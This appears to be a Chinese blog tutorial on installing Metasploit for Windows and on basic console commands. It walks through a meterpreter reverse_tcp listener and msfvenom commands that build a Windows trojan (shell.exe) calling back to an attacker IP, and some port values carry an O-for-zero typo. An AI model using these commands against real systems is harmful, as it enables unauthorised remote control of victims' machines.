msf安装使用基本操作

简介

Metasploit是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时，计算机安全状况也被永久性地改变了。仿佛一夜之间，任何人都可以成为黑客，每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了，这是因为Metasploit团队一直都在努力开发各种攻击工具，并将它们贡献给所有Metasploit用户。

1.安装

下载链接：

https://www.metasploit.com/

点击选择相应版本下载，我下的是win64版本， 

 一路next安装，选择默认设置即可。

2.使用

1.启动方式

多种使用方式

1可以打开安装bin目录直接启动默认安装目录在C:\metasploit-framework\bin

双击msfconsole.bat文件启动

2可以将目录C:\metasploit-framework\bin添加配置到系统环境变量Path，然后打开命令行cmd直接msfconsole即可使用

3创建快捷方式将目标地址修改为C:\metasploit-framework\bin，双击快捷方式即可。

 2.攻击模块

展示辅助模块

show auxiliary

 显示对应模块信息

info auxiliary/vsploit/pii/web_pii

 搜索模块信息

search windows

 使用监听模块

use exploit/multi/handler

 

 设置payload攻击载荷

set payload windows/meterpreter/reverse_tcp

 

 options查看设置选项

options或show options

 设置坚监听主机ip和端口并查看设置情况

set LHOST 192.168.1.105
set LPORT 10010
options

 exploit或run执行

exploit-j后台执行

 

 生成windows木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP地址LPORT=1O000 -f exe>C:\tool\shell.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=1O010 -f exe>C:\tool\shell.exe

 jobs查看监听状况

 sessions -i 1连接meterperter

kill 1 杀死监听进程

sysinfo查看系统信息

shell进入终端

background进入后台

help查看帮助命令

 目前总结的就是这些。